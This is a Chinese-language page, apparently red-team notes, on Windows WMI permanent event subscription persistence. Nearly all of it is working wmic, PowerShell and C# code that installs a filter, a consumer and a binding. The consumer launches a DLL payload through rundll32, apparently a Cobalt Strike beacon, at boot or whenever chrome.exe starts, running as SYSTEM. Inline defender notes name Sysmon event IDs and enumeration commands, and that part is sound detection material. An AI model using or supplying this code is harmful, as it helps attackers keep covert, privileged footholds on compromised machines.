
WMI事件

WMI事件,是特定对象被创建、修改或删除时由 WMI 发出的通知,对应 __InstanceCreationEvent、__InstanceModificationEvent、__InstanceDeletionEvent 三种类型。事件过滤器、事件消费者以及二者的绑定可以使用 wmic 命令(也可以用 PowerShell 或 C#,见下文)来创建,它们保存在 root\subscription 命名空间中,属于永久订阅。

利用代码

命令行:

# Register an event filter. Its WQL query polls (WITHIN 20 s) for the point where
# system uptime is between 120 and 150 s, i.e. 2 to 2.5 minutes after boot.
# Because this is a permanent WMI event subscription (stored in root\subscription),
# creating it requires administrator rights; the command the consumer runs ends up
# executing as SYSTEM.
wmic /NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
# Register an event consumer. This is where the command to execute is stored:
# cmd.exe /c launching the CS DLL with rundll32.
wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
# Bind the event filter to the event consumer; the consumer only fires once this
# binding exists.
# Defender note: all three objects (__EventFilter, CommandLineEventConsumer,
# __FilterToConsumerBinding) remain in root\subscription across reboots until
# deleted, and can be enumerated there (wmic GET in the same namespace, or
# Get-WmiObject -Namespace root\subscription). Sysmon records their creation as
# event IDs 19, 20 and 21 respectively.
wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""

Powershell:

# Permanent WMI event subscription via Set-WmiInstance: an __EventFilter, a
# CommandLineEventConsumer and a __FilterToConsumerBinding are created in the
# root\subscription namespace. One hashtable is reused for all three calls by
# splatting (@wmiParams); only .Class and .Arguments change between steps, and
# statement order matters because the binding consumes the objects returned by
# the first two calls.
# Defender note: the three instances persist across reboots until removed and
# can be listed with
#   Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding
# (likewise for __EventFilter and CommandLineEventConsumer). Where Sysmon is
# deployed their creation is recorded as event IDs 19, 20 and 21.
$wmiParams = @{
  NameSpace = 'root\subscription'
}
# Creating a new event filter: WQL polls every 5 s for a newly created
# Win32_Process whose Name is chrome.exe
$wmiParams.Class = '__EventFilter'
$wmiParams.Arguments = @{
  Name           = 'BugSecFilter'
  EventNamespace = 'root\CIMV2'
  QueryLanguage  = 'WQL'
  Query          = "select * from __InstanceCreationEvent  within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
}
$filterResult = Set-WmiInstance @wmiParams   # the created __EventFilter instance
# Creating a new consumer: holds the command line that runs when the filter fires
$wmiParams.Class = 'CommandLineEventConsumer'
$wmiParams.Arguments = @{
  Name                = 'BugSecConsumer'
  CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
}
$consumerResult = Set-WmiInstance @wmiParams   # the created consumer instance
# Bind filter to consumer: the two objects returned above are passed as the
# Filter / Consumer reference properties of the binding
$wmiParams.Class = '__FilterToConsumerBinding'
$wmiParams.Arguments = @{
  Filter   = $filterResult
  Consumer = $consumerResult
}
Set-WmiInstance @wmiParams

C#:

using System;
using System.Text;
using System.Management;
namespace WMIPersistence
{
  /// <summary>
  /// Console program that installs a permanent WMI event subscription in
  /// root\subscription: an __EventFilter watching for a new chrome.exe process,
  /// a CommandLineEventConsumer holding the command to run, and the
  /// __FilterToConsumerBinding that ties the two together.
  /// Defender note: the three Put() calls in <see cref="PersistWMI"/> are the
  /// writes that WMI persistence monitoring keys on (Sysmon event IDs 19, 20
  /// and 21 for filter, consumer and binding); the objects survive reboots
  /// until explicitly deleted from root\subscription.
  /// </summary>
  class Program
  {
    /// <summary>Entry point; delegates to <see cref="PersistWMI"/>.</summary>
    static void Main(string[] args)
    {
      PersistWMI();
    }
    /// <summary>
    /// Creates the event filter and command-line consumer, then binds them.
    /// Any exception is printed to the console and execution falls through to
    /// Console.ReadKey(), so a partially created subscription (e.g. filter
    /// written, binding failed) is left in place rather than rolled back.
    /// The ManagementObject instances are IDisposable but are never disposed here.
    /// </summary>
    static void PersistWMI()
    {
      ManagementObject myEventFilter = null;
      ManagementObject myEventConsumer = null;
      ManagementObject myBinder = null;
      // Command line the consumer executes when the filter fires.
      String CommandLine = @"cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll";
      // WQL: poll every 5 s for a newly created Win32_Process named chrome.exe.
      String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
                           "WHERE TargetInstance ISA \"Win32_Process\" " +
                           "AND TargetInstance.Name = \"chrome.exe\"";
      try
      {
        // All three objects are written to root\subscription on the local machine.
        ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
        ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
        WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
        // Filter: name, query text and language, and the namespace the query runs in.
        myEventFilter = wmiEventFilter.CreateInstance();
        myEventFilter["Name"] = "BugSecFilter";
        myEventFilter["Query"] = myEventQuery.QueryString;
        myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
        myEventFilter["EventNameSpace"] = @"\root\cimv2";
        myEventFilter.Put(); // first persistent write
        // Consumer: name plus the command line to run.
        myEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
        myEventConsumer["Name"] = "BugSecConsumer";
        myEventConsumer["CommandLineTemplate"] = CommandLine;
        myEventConsumer.Put();
        // Binding: references filter and consumer by relative path. The paths are
        // read after their Put() calls, which is presumably why the binding is
        // created last; the subscription is only active once this Put() succeeds.
        myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
        myBinder["Filter"] = myEventFilter.Path.RelativePath;
        myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
        myBinder.Put();
      }
      catch (Exception e)
      {
        // Best-effort reporting only; nothing created so far is removed.
        Console.WriteLine(e);
      }
      // Blocks until a key is pressed; throws if standard input is redirected.
      Console.ReadKey();
    }
  }
}

参考文章:
